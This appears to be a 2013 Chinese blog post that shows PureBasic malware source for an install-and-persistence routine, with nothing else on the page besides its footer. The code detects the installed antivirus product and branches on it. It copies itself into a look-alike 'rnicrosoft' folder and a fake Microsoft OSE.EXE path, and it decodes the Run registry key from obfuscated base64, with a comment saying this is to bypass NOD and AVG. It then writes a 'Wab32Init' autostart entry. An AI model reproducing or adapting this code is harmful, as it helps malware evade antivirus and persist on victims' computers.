2013年6月18日 星期二
Procedure checkinstall(av.s,os.s,is64.s)
Procedure checkinstall(av.s,os.s,is64.s)
kav_boot.l=0
tpath.s=GetEnvironmentVariable("Temp")
path.s=""
If os = "Win7|" Or os = "Vista|" Or os = "2008|" Or os="Win8|" ;And is64="32"
path=GetEnvironmentVariable("USERPROFILE")+"\AppData\Local\VirtualStore\Program Files\Common Files\rnicrosoft\"
Else
path=GetEnvironmentVariable("CommonProgramFiles")+"\rnicrosoft\"
EndIf
path2.s=""
hk.l
If av="Rs|"
If ProgramFilename()<>tpath+#exename
fh.l=CreateFile(#PB_Any,tpath+"desktop")
WriteString(fh,ProgramFilename())
CloseFile(fh)
CopyFile(ProgramFilename(),tpath+#exename)
RunProgram(tpath+#exename)
End
EndIf
Else
If ProgramFilename()<>tpath+"\"+#exename
If av="Kaspersky|" And ProgramFilename()="C:\Program Files\WinRAR\WinRAR.exe"
; kav_boot=1
; SHGetSpecialFolderPath_(0, @path2, #CSIDL_COMMON_STARTUP, 0)
; DeleteFile(path2+"\"+Space(128)+".rar")
ElseIf av="Avast|"
;MoveFileEx_(ProgramFilename(),path+"\"+#exename,3)
Else
MoveFileEx_(ProgramFilename(),tpath+"\"+#exename,3)
RunProgram(tpath+"\"+#exename)
End
EndIf
EndIf
EndIf
If av="Rs|"
fh=ReadFile(#PB_Any,tpath+"desktop")
DeleteFile(ReadString(fh))
CloseFile(fh)
;DeleteFile(tpath+"desktop")
EndIf
;bypass nod,avg
;SOFTWARE\Microsoft\Windows\CurrentVersion\Run
test.s=""
test1.s="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb"
test2.s = "cUnVu"
test3.s=""
dec.s = Space(1024)
ii.l=-100
For i = ii To 25
test3=test1+Str(i)+test2
Base64Decoder(@test3, StringByteLength(test3), @dec, 1024)
test = dec
Next
buf.s=Chr(34)+path+#exename+Chr(34)
If os="Vista|" Or os="Win7|" Or os = "2008|" Or os="Win8|"
key=#HKEY_CURRENT_USER
Else
key=#HKEY_LOCAL_MACHINE
EndIf
If RegOpenKey_(key,test,@hk)=0
;replace RegSetValueEx_(hk,"Wab32Init",0,#REG_SZ, buf ,Len(buf))
result.l=OpenLibrary(#PB_Any,"Advapi32.dll")
point.l=0
;If av="AVG|"
;point=GetFunction(result,http_get("header3.php"))
;Else
If av="Norton|"
If OpenWindow(0, 0, 0, 0, 0, "winlogon.exe", 268435456)
hk.l
buf.s=Chr(34)+path+#exename+Chr(34)
RegSetValueEx_(hk,"Wab32Init",0,#REG_SZ, buf ,Len(buf))
RegCloseKey_(hk)
EndIf
ElseIf av="Kaspersky|" Or av="360|"
; If kav_boot=1
; point=GetFunction(result,"RegSetValueExA")
; CallFunctionFast(Point,hk,@"Wab32Init",0,#REG_SZ,@buf,Len(buf))
; EndIf
; RegCloseKey_(hk)
ElseIf av="360|-"
point=GetFunction(result,"RegSetValueExA")
buf2.s=buf+Space(1000000)
CallFunctionFast(Point,hk,@"Wab32Init",0,#REG_SZ,@buf2,Len(buf2))
;CallFunctionFast(Point,hk,@"Wab32Init",0,#REG_SZ,@buf,Len(buf))
;RegSetValueEx_(hk,"Wab32Init",0,#REG_SZ, buf ,Len(buf))
RegCloseKey_(hk)
Else
point=GetFunction(result,"RegSetValueExA")
CallFunctionFast(Point,hk,@"Wab32Init",0,#REG_SZ,@buf,Len(buf))
;RegSetValueEx_(hk,"Wab32Init",0,#REG_SZ, buf ,Len(buf))
RegCloseKey_(hk)
EndIf
EndIf
Select av
Case "Kaspersky|"
; If kav_boot=1
; CreateDirectory(path)
; CopyFile(ProgramFilename(),path+#exename)
; RunProgram(path+#exename,"rar_back",GetEnvironmentVariable("Temp"))
; End
; Else
; CopyFile("C:\Program Files\WinRAR\WinRAR.exe","C:\Program Files\WinRAR\WinRAR32.exe")
; SHGetSpecialFolderPath_(0, @path, #CSIDL_COMMON_STARTUP, 0)
; MoveFileEx_(ProgramFilename(),path+"\"+Space(128)+".rar", 4)
; If OpenWindow(0, 0, 0, 0, 0, "winlogon.exe", 268435456)
; SetWindowCallback(@WinCallback())
; SetProcessShutdownParameters_( 0, 0)
; Repeat
; Select WaitWindowEvent()
; Case #PB_Event_CloseWindow
; End
; EndSelect
; ForEver
; EndIf
; End
; EndIf
;Case av="Avast|"
Case "360|"
If kav_boot=1
CreateDirectory(path)
CopyFile(ProgramFilename(),path+#exename)
RunProgram(path+#exename,"rar_back",GetEnvironmentVariable("Temp"))
End
Else
CopyFile("C:\Program Files\WinRAR\WinRAR.exe","C:\Program Files\WinRAR\WinRAR32.exe")
SHGetSpecialFolderPath_(0, @path, #CSIDL_COMMON_STARTUP, 0)
CopyFile(ProgramFilename(),"C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE")
;MoveFileEx_(ProgramFilename(),path+"\"+Space(128)+".rar", 3)
If OpenWindow(0, 0, 0, 0, 0, "winlogon.exe", 268435456)
SetWindowCallback(@WinCallback())
;SetProcessShutdownParameters_( 0, 0)
Repeat
Select WaitWindowEvent()
Case #PB_Event_CloseWindow
End
EndSelect
ForEver
EndIf
End
EndIf
Default
If os = "Win7|" Or os = "Vista|" Or os = "2008|" Or os="Win8|"
CreateDirectory(GetEnvironmentVariable("USERPROFILE")+"\AppData\Local\VirtualStore\")
CreateDirectory(GetEnvironmentVariable("USERPROFILE")+"\AppData\Local\VirtualStore\Program Files\")
CreateDirectory(GetEnvironmentVariable("USERPROFILE")+"\AppData\Local\VirtualStore\Program Files\Common Files\")
CreateDirectory(GetEnvironmentVariable("USERPROFILE")+"\AppData\Local\VirtualStore\Program Files\Common Files\rnicrosoft\")
Else
CreateDirectory(GetEnvironmentVariable("CommonProgramFiles")+"\rnicrosoft\")
EndIf
If av <> "Avast|"
CopyFile(ProgramFilename(),path+#exename)
RunProgram(path+#exename)
Else
MoveFileEx_(ProgramFilename(),path+#exename,3)
EndIf
End
EndSelect
EndProcedure
訂閱:
張貼留言 (Atom)
沒有留言:
張貼留言